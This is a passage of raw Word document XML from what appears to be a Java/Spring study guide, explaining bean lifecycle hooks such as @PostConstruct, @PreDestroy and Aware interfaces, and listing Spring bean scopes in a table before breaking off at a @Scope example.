      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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with destroy() method, called when the bean is being destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED39F1A" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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anPostProcessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378B5F38" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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face with postProcessBeforeInitialization() and postProcessAfterInitialization() methods. Allows you to modify beans before and after initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0B8B6" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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ostConstruct</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B285B" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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n annotation used to mark a method to be executed after the bean has been initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30583035" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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eDestroy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E328D" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="184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An annotation used to mark a method to be executed before the bean is destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67262822" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DF40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A11B774">
          <v:rect id="_x0000_i2070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE832F" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF404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1C5B6BF5" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF404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XML-based Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A494D39" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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t;bean id="myBean" class="com.example.MyBean" init-method="init" destroy-method="cleanup"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69247EE3" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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t;/bean&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3824BBFB" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF404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Java-based Configuration (with annotations):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C6D23" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3303D991" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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yBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE6146" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A68CD9" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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ostConstruct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0776598C" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255F4DF" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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Initialization logic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A004E0" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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3E7D481" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD00525" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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eDestroy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6243B2" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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cleanup() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CBC2AE" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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Cleanup logic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F85DD6" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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50349F4D" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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DD02E88" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF404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Implementation of Aware Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695DDEB" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F30ED" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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MyBean implements BeanNameAware, ApplicationContextAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB4C28C" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13985585" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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56158EEE" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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setBeanName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14192278" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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Bean name is: " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C1F8D" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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A63226A" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082C0D36" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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1D0375C9" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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void setApplicationContext(ApplicationContext context) throws BeansException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CA5718" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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ystem.out.println("ApplicationContext is: " + context);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757BFA99" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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049B957" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF40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7581EE4" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DF40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4B7B4BC">
          <v:rect id="_x0000_i2071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA5D3F7" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">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lusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C17AFB" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">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Spring Bean Lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives developers the flexibility to hook into various stages of a bean’s lifecycle (from creation to destruction), enabling them to manage initialization, configuration, and cleanup processes efficiently. This is important in complex applications where resources need to be managed carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D5397" w14:textId="0FF25A7E" w:rsidR="00E42DCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E42DC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8354DB1">
          <v:rect id="_x0000_i2072" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="701EAD0A" w14:textId="1A13DA5A" w:rsidR="009F301D" w:rsidRPr="00CE4B95" w:rsidRDefault="009F301D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="428" w:name="_Toc196307908"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the spring bean scopes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="428"/>
    </w:p>
    <w:p w14:paraId="08749739" w14:textId="338B93DE" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="002D1D6B">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bean scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring defines </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how long a bean live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how many instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the bean are created and maintained by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA26D1" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EE58F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A374123">
          <v:rect id="_x0000_i2073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6A6AD" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B95" w:rsidRDefault="003D2495" w:rsidP="00EE58F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B101A35" w14:textId="1C3F1288" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="00EE58F0">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mmon Bean Scopes in Spr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7"/>
        <w:gridCol w:w="6133"/>
        <w:gridCol w:w="2604"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="24AFC488" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33CA4DE1" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="003D2495">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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="731A767E" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="003D2495">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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5940C418" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="003D2495">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ere Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="1C6F560B" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="061359E5"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gleton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F6C5A6B"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fault) A single shared instance per Spring container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AD5857F"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pplication-wide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="023B4B70" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7644B60A"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ototype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="450899DD"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new bean instance is created </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>every time</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> it's requested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7603936A"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ghtweight, stateful objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="11A2287A" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37C9B9F7"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quest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F00E00"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single bean per </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HTTP request</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (only in web-aware Spring contexts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2455FB9B"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eb apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="1EE5EB5C" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14F78885"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ssion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="773D12A1"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bean lives for the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lifetime of an HTTP session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D00B327"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eb apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="02178F3E" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7582FC90"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pplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D201FD7"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bean lives for the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lifetime of ServletContext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14725AF1"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eb apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="1379B202" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CDF0022"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ebsocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7215048C"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bean is tied to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lifecycle of a WebSocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B5C6ACB"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ebSocket apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EAEBC69" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EE58F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4CAB75B">
          <v:rect id="_x0000_i2074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EDF23" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="00EE58F0">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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example Usage in Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275133F3" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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86846"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142BB87" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B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86846"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Scop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rototype"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
